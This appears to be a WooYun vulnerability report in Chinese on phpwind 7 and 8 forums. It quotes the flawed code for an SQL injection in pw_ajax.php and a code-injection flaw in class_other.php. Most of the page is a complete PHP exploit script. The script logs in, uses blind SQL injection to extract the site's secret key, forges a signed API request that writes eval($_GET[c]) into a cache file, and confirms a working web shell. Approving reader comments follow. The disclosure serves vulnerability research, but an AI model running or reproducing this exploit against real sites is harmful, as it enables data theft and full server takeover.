2010-09-05: 积极联系厂商并且等待厂商认领中,细节不对外公开 2010-09-06: 厂商已经主动忽略漏洞,细节向公众公开
phpwind较高版本论坛中存在一个严重的漏洞,成功利用该漏洞可以远程执行任意php代码,影响phpwind 7和phpwind 8
pw_ajax.php中的
} elseif ($action == 'pcdelimg') { InitGP(array('fieldname','pctype')); InitGP(array('tid','id'),2); if (!$tid || !$id || !$fieldname || !$pctype) { echo 'fail'; } $id = (int)$id; if ($pctype == 'topic') { $tablename = GetTopcitable($id); } elseif ($pctype == 'postcate') { $tablename = GetPcatetable($id); } $path = $db->get_value("SELECT $fieldname FROM $tablename WHERE tid=". pwEscape($tid));
fieldname未经任何有效的过滤(全局的一些其他的比较搞笑看起来不错的过滤对这里不起任何安全上的意义,只是对漏洞利用带来了一些难度),利用该注射可以获取任何数据库里的数据。另外class_other.php中存在一个任意命令执行的漏洞
function threadscateGory($classdb) {//生成帖子交换分类 $classcache = "<?php\r\n\$info_class=array(\r\n"; foreach ($classdb as $key => $class) { !$class['ifshow'] && $class['ifshow'] = '0'; $flag && $info_class[$class['cid']]['ifshow'] && $class['ifshow'] = '1'; $class['name'] = str_replace(array('"',"'"),array(""","'"),$class['name']); $classcache .= "'$class[cid]'=>".pw_var_export($class).",\r\n\r\n"; } $classcache .= ");\r\n?>"; writeover(D_P."data/bbscache/info_class.php",$classcache); }
$class[cid]未经过滤,进入此逻辑需要一些较为关键的key,借助上面的注射漏洞即可获得该key
Poc:
<?phpecho " Info: Poc for Phpwind远程命令执行Test: exploit.php user password http://www.wooyun.org/phpwind/";if($argc<3){ echo "\r\n参数缺少\r\n"; die();}$user=$argv[1];$pass=$argv[2];$pwurl=$argv[3];$myheader=array( 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: zh-cn,zh;q=0.5', 'Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7', 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8', 'Referer: http://www.wooyun.org/', 'Connection: Keep-Alive', 'Cache-Control: no-cache', 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)' );$cookie="";$str=curlsend("$pwurl/login.php?","POST",0,$myheader,"forward=&jumpurl=http%3A%2F%2F127.0.0.1%2FPHPWind/upload%2F&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC",1);preg_match_all("/Set-Cookie:([^;]+)/is",$str,$array);for($i=0;$i<count($array[1]);$i++){ $cookie=$cookie.";".$array[1][$i];}//echo $cookie;$test = curlsend('$pwurl/pw_ajax.php',"POST",0,$myheader,'',1);if(strpos($test,'<ajax>')) { die('用户密码或者其他参数错误');}$shellcode="action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23";$hash="0123456789abcdef";$craked="";for($i=0;$i<32;$i++){ for($n=0;$n<16;$n++){ $tmp=str_replace("{offset}",bin2hex($craked.$hash[$n]),$shellcode); $tmp=curlsend("$pwurl/pw_ajax.php","POST",0,$myheader,$tmp,0); if(strpos($tmp,"pw_config")){ echo "CrackEd Offset ".($i+1)." :".$hash[$n]."\r\n"; $craked=$craked.$hash[$n]; break; } }}echo "Craked Magicdata :".$craked."\r\n";echo "Get shell :";//another 0day$arg='';$hack = array();$hack['mode'] = 'Other';$hack['method'] = 'threadscateGory';$hack['params'] = 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:21:"\'.eval($_GET[c]).\'abc";}}}';$hack['type'] = 'app';$hack = strips($hack);ksort($hack);reset($hack);foreach ($hack as $key => $value) { if ($value && $key != 'sig') { $arg .= "$key=$value&"; }}$arg.='sig='.md5($arg.$craked);echo file_get_contents("$pwurl/pw_api.php?".$arg);echo "OK\r\n";$str=file_get_contents("$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;");if(strpos($str,'wooyun')){ echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=phpinfo();"; echo "\r\nOver!";}function strips($param) { if (is_array($param)) { foreach ($param as $key => $value) { $param[$key] = strips($value); } } else { $param = stripslashes($param); } return $param;}function curlsend($url,$method=false,$ssl=0,$myheader,$data='',$header=0){global $cookie;$ch = curl_init();$timeout = 0; // set to zero for no timeoutcurl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_POST, $method);curl_setopt($ch,CURLOPT_HTTPHEADER,$myheader);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);curl_setopt ($ch, CURLOPT_COOKIE, $cookie);if($data){curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);}curl_setopt ($ch, CURLOPT_HEADER, $header);if($ssl){ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);}$handles = curl_exec($ch);curl_close($ch);//echo $handles;return $handles;}
深入进去过滤吧...
未能联系到厂商或者厂商积极拒绝
漏洞Rank:20 (WooYun评价)
围观一下
exp编写能力真强!
给力!